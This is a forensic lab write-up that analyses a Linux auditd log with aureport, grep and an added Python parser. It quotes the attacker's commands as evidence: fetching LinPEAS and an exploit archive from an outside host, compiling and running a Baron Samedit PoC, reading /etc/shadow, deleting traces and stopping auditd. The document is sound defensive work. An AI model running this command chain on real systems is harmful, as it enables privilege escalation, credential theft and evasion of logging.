An 83,000-line audit.log file is provided for analysis. The investigation centres on identifying how an attacker gained initial access, how they escalated privileges, and what they took on the way out. The primary tool for parsing Linux auditd logs is aureport, which translates dense key=value records into readable reports.
The first step is getting a summary of the log to understand what event types are present:
aureport -if audit.log --summary
The output immediately tells a story — 87 failed logins against a single successful one, 89 failed authentications, and a 6-minute window covering the entire incident from 05/10/21 11:22:07 to 11:28:06. Over 100 unique executables and 192 commands confirm significant post-exploitation activity.
Pulling the failed login report:
aureport -if audit.log --login --failed
All failures originate from 192[.]168[.]4[.]155, targeting the btlo account via SSH. After 87 failed attempts the attacker eventually succeeded, with the successful login recorded at 11:23:16:
aureport -if audit.log --login --success
The compromised account is confirmed as btlo (UID 1001), visible in USER_AUTH events:
grep -aoP 'acct="[^"]+"' audit.log | sort -u
With a foothold established, the attacker immediately pulled down LinPEAS from their own HTTP server:
grep -a "linpeas" audit.log
a0="wget" a1="-O" a2="-" a3="hxxp[://]192[.]168[.]4[.]155:8000/linpeas.sh"
The characteristic LinPEAS execution signature is visible in the EXECVE records — thousands of calls to grep, sed, cut, awk, find, id, env, and whoami in rapid succession, along with a massive find sweep hunting for credential files, config files, SSH keys, and database configs across the filesystem.
After enumeration, the attacker downloaded a pre-packaged exploit archive from their HTTP server, compiled it on the box, and executed it:
grep -a "evil" audit.log
The full attack chain is visible in the logs:
wget http://192.168.4.155:8000/evil.tar.gz
tar zxvf evil.tar.gz
gcc -o evil hax.c
./evil 0
The binary evil was compiled from hax.c — a PoC for CVE-2021-3156, also known as Baron Samedit. This is a heap-based buffer overflow in sudo’s argument handling, triggerable via sudoedit. It affects sudo versions prior to 1.9.5p2 and allows any local user to gain full root privileges without requiring a password. The SYSCALL record confirms execution under auid=1001 (btlo) with pid=829992.
With root access achieved, the attacker read /etc/shadow — the hashed password file readable only by root:
a0="cat" a1="/etc/shadow"
This provides offline cracking material for all local accounts on the system.
Before disconnecting, the attacker removed all traces of the exploit:
rm -rf /home/btlo/evil
rm /home/btlo/evil.tar.gz
The attacker also issued service auditd stop (decoded from hex in the USER_CMD records) in an attempt to halt further logging.
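The aureport and grep steps above all rest on the same record layout, so as an added illustration (example code written for this write-up, not the author's or the auditd project's) here is a small Python parser for auditd key=value records: it flattens the nested msg='...' payload of USER_* events, hex-decodes fields such as the USER_CMD cmd= value, reassembles EXECVE argv, tallies failed logins per source address, and flags sudo commands aimed at the audit daemon. The sample records are constructed for the example, not lines from the page's audit.log.

```python
import re
from collections import Counter

# Constructed sample records in auditd's key=value layout (not lines from the
# page's audit.log); cmd= is hex-encoded, as auditd does for values with spaces.
SAMPLE_LOG = """\
type=USER_LOGIN msg=audit(1620645727.001:4500): pid=1200 uid=0 auid=4294967295 ses=4294967295 msg='op=login acct="btlo" exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=failed'
type=USER_LOGIN msg=audit(1620645796.002:4520): pid=1210 uid=0 auid=4294967295 ses=4294967295 msg='op=login id=1001 exe="/usr/sbin/sshd" hostname=192.168.4.155 addr=192.168.4.155 terminal=ssh res=success'
type=EXECVE msg=audit(1620645830.003:4570): argc=4 a0="wget" a1="-O" a2="-" a3="http://192.168.4.155:8000/linpeas.sh"
type=EXECVE msg=audit(1620645900.004:4600): argc=2 a0="./evil" a1="0"
type=USER_CMD msg=audit(1620646080.005:4700): pid=830100 uid=1001 auid=1001 ses=3 msg='cwd="/home/btlo" cmd=73657276696365206175646974642073746F70 exe="/usr/bin/sudo" terminal=pts/0 res=success'
"""

FIELD_RE = re.compile(r"(\w+)=('[^']*'|\"[^\"]*\"|\S+)")
HEX_FIELDS = re.compile(r"^(cmd|proctitle|acct|comm|a\d+)$")  # fields auditd may hex-encode

def _decode(key, value):
    """Strip quotes; hex-decode unquoted values of fields auditd hex-encodes."""
    if value[:1] in ("'", '"') and value[-1:] == value[:1]:
        return value[1:-1]
    if HEX_FIELDS.match(key) and len(value) % 2 == 0 and re.fullmatch(r"[0-9A-Fa-f]+", value):
        return bytes.fromhex(value).decode("utf-8", "replace")
    return value

def parse_record(line):
    """Parse one record, flattening the nested msg='...' payload of USER_* events."""
    rec = {}
    for key, value in FIELD_RE.findall(line):
        if key == "msg" and value.startswith("audit("):
            ts, serial = value[6:].rstrip(":)").split(":")  # audit(ts:serial):
            rec["timestamp"], rec["serial"] = float(ts), int(serial)
        elif key == "msg" and value.startswith("'"):
            rec.update(parse_record(value[1:-1]))
        else:
            rec[key] = _decode(key, value)
    return rec

def parse_log(text):
    return [parse_record(l) for l in text.splitlines() if l.strip()]

def failed_logins_by_source(records):
    """Failed USER_LOGIN count per source address (what aureport --login --failed tallies)."""
    return Counter(r["addr"] for r in records if r.get("type") == "USER_LOGIN" and r.get("res") == "failed")

def execve_argv(rec):
    """Reassemble a0..aN of an EXECVE record into the argv that was executed."""
    return [rec[f"a{i}"] for i in range(int(rec.get("argc", 0)))]

def auditd_tamper_commands(records):
    """Decoded sudo commands (USER_CMD) that stop or disable the audit daemon."""
    return [r["cmd"] for r in records if r.get("type") == "USER_CMD"
            and re.search(r"auditd\s+(stop|disable)|systemctl\s+(stop|disable)\s+auditd", r.get("cmd", ""))]
```

Run the functions over `parse_log(open("audit.log").read())` to reproduce the failed-login and command tallies that aureport summarises, with the hex-encoded cmd= values already decoded.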
| Type | Value |
|---|---|
| IP — Attacker | 192[.]168[.]4[.]155 |
| Compromised Account | btlo |
| Attacker HTTP Server | hxxp[://]192[.]168[.]4[.]155:8000 |
| Enumeration Tool | linpeas.sh |
| Exploit Archive | evil.tar.gz |
| Exploit Binary | /home/btlo/evil/evil |
| Exploit Source | hax.c |
| CVE | CVE-2021-3156 |
| Exfiltrated File | /etc/shadow |